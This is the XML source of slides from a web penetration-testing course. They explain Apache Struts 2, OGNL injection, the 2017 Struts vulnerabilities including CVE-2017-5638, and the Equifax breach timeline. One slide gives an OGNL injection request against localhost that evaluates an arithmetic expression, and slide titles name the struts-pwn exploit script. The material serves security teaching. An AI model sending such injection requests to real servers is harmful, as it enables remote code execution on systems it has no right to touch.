      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1399429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cap="none" dirty="0"/>
              <a:t>Struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Usually uses .action resource extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>User input -&gt; action in addition to a form:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="398463" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Form in struts2 is called a model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="398463" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Developers usually just call the action (easier)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>OGNL (Object Graph Notation Language):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="398463" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Input parameters are OGNL statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="398463" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Run on the action or model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="398463" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Equivalent to Java in expressiveness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1798421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W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
              <a:t>hy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0"/>
              <a:t>should we learn about frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Many Struts 2 CVEs come from OGNL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Vulnerable OGNL Injection Code (CVE-2013-2135):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>OGNL Injection Exploit Request:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    http://localhost:8080/example/HelloWorld.action?message=${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%{1+2}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Results in OGNL executing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>%{1+2}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> code and writing the number 3 back to the user's browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Part of a number of injection vulnerabilities found/fixed in 2013</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>One may have been used to exploit Apple Developer site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432661" y="2357744"/>
            <a:ext cx="11277600" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="9144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r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;result type="httpheader"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    &lt;param name="headers.foobar"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>${message}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/param&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/result&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13718714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2800" cap="none" dirty="0"/>
              <a:t>Seriously, 2017 was a bad year for Struts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>How many bugs were there?!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S2-045 (March Bug) : Upload bug we will talk about </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injecting OGNL to error handing leading to OGNL…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S2-046 (Another Struts bug): Different Area</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S2-048 (Struts1..wait what?): RCE with using Struts 2 Struts 1 action...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S2-052 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Xstream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Handler RCE): Object Deserialization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S2-053 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Freemarker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> RCE): Another SSTI </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Server Side Template Injection)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1183728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cap="none" dirty="0"/>
              <a:t>Case Study: Equifax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ED2AEB5-5323-435A-B18B-1E67525E46B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017/03/08 - US-CERT advisory received by Equifax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017/03/09 - email disseminated internally</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017/03/15 - scanned for vulnerable Struts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017/07/29 - suspicious traffic observed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017/07/30 - more suspicious activity/traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2017/07/30 - Web application taken offline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intrusion was 2017/05/13</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They had a patching policy!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Couldn't find Struts?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62857675-D2B9-43AC-BF96-3429CA51DF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200" y="4648200"/>
            <a:ext cx="6301673" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1680793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cap="none" dirty="0"/>
              <a:t>Struts 2 CVE-2017-5638</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jakarta Multipart parser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execute arbitrary commands </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>via a crafted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Content-Type, Content-Disposition, or Content-Length </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= string.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CVSS v3 Base Score: 10.0 Critical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vector:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (legend)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3778132465"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_Title Pag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ns_master-slides_sans-blue_simplified_p1" id="{3DD29A76-C55E-464E-8822-2E4E973AFA7C}" vid="{BDCE8736-7128-F547-B11E-B4F9435B61AC}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_Basic Layout Page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ns_master-slides_sans-blue_simplified_p1" id="{3DD29A76-C55E-464E-8822-2E4E973AFA7C}" vid="{2A238399-2CCD-054A-BB5C-6E712DDAAD9E}"/>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76856</TotalTime>
  <Words>2673</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>259</Paragraphs>
  <Slides>23</Slides>
  <Notes>16</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23</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="34" baseType="lpstr">
      <vt:lpstr>Gill Sans</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Georgia</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>1_Title Page</vt:lpstr>
      <vt:lpstr>1_Basic Layout Pages</vt:lpstr>
      <vt:lpstr>SEC642</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Frameworks</vt:lpstr>
      <vt:lpstr>Struts</vt:lpstr>
      <vt:lpstr>Struts 2</vt:lpstr>
      <vt:lpstr>Why should we learn about frameworks?</vt:lpstr>
      <vt:lpstr>Seriously, 2017 was a bad year for Struts</vt:lpstr>
      <vt:lpstr>Case Study: Equifax</vt:lpstr>
      <vt:lpstr>Struts 2 CVE-2017-5638</vt:lpstr>
      <vt:lpstr>How does it work?</vt:lpstr>
      <vt:lpstr>SSTI?</vt:lpstr>
      <vt:lpstr>Equifax: Scanning</vt:lpstr>
      <vt:lpstr>So, what's the problem?</vt:lpstr>
      <vt:lpstr>Equifax improvements</vt:lpstr>
      <vt:lpstr>./struts-pwn.py --check and the false negative</vt:lpstr>
      <vt:lpstr>Getting the URL</vt:lpstr>
      <vt:lpstr>nmap nse with and without the path to showcase</vt:lpstr>
      <vt:lpstr>./strut-spwn.py with the correct URL</vt:lpstr>
      <vt:lpstr>SEC 642</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>COURSE RESOURCES AND CONTACT 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642 Advanced Web App Penetration Testing Day 2</dc:title>
  <dc:subject>Attacking Web Cryptography</dc:subject>
  <dc:creator>Justin Searle and Adrien de Beaupre</dc:creator>
  <cp:keywords>642</cp:keywords>
  <dc:description>processed_08.22.17_mgq_x000d_
processed_12.21.16.rr_x000d_
processed_07.19.16.rr_x000d_
processed_03.13.15.rr_x000d_
processed_10.09.14.rr_x000d_
processed_02.22.13.rlr</dc:description>
  <cp:lastModifiedBy>Adrien de Beaupre</cp:lastModifiedBy>
  <cp:revision>2235</cp:revision>
  <cp:lastPrinted>2017-08-25T00:10:08Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2003-10-14T20:59:56Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-04-19T18:43:55Z</dcterms:modified>
  <cp:category>Security</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052814">
    <vt:lpwstr>processed rmw</vt:lpwstr>
  </property>
</Properties>
</file>